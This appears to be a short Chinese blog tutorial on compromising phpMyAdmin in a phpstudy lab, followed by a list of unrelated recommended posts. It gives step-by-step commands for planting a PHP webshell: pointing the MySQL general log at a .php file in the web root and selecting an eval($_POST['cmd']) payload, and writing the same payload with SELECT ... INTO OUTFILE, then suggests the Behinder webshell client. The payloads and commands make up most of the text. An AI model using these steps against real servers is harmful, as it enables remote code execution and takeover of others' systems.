常见cms漏洞之PhPMyadmin

环境phpstudy

安装后直接访问即可密码为mysql的密码,在小皮中即可查看

通过日志文件拿Shell

利用mysql日志文件写shel,这个日志可以在mysql里改变它的存放位置,登录phpmyadmin可以修改这个存放位置,并且可以修改它的后缀名。所以可以修改成php的后缀名就能获取一个webshell。

把值修改为on,以及www下的php文件

然后去select语句

复制代码
select "<?php phpinfo();eval($_POST['cmd']);?>"

导入导出拿WebShell

1.首先判断mysql位置

复制代码
select @@datadir

2.猜测web路径猜测web路径扩展的同级目录下存在www目录

复制代码
C:\phpstudy_pro\WWW\222.php

3.写入webshell

复制代码
select  "<?php phpinfo();@eval($_POST[cmd]);" into outfile "C:/phpstudy_pro/WWW/222.php"

对webshell使用冰蝎吧!

相关推荐
冻咸鱼2 小时前
MySQL中表操作
android·sql·mysql·oracle
技术小黑屋_2 小时前
从零搭建 Android ADB MCP Server:让 AI 助手直接操控你的 Android 设备
android·adb
2501_915921432 小时前
iOS混淆与IPA加固实战手记,如何构建苹果应用防反编译体系
android·macos·ios·小程序·uni-app·cocoa·iphone
Jeled3 小时前
Android 集成指南:Google 登录、Facebook 登录 与 Firebase 深入接入(实战)
android·kotlin·android studio·memcached·facebook
用户093 小时前
Android唤醒锁优化指南
android·面试·kotlin
aqi004 小时前
FFmpeg开发笔记(八十三)国产的视频裁剪框架AndroidVideoTrimmer
android·ffmpeg·音视频·流媒体
困到晕阙5 小时前
[Zer0pts2020]Can you guess it?
android
写点啥呢5 小时前
android取消每次u盘插入创建无用(媒体)文件夹
android·u盘·车机·aosp
杨筱毅5 小时前
【Android】RecyclerView LayoutManager 重写方法详解
android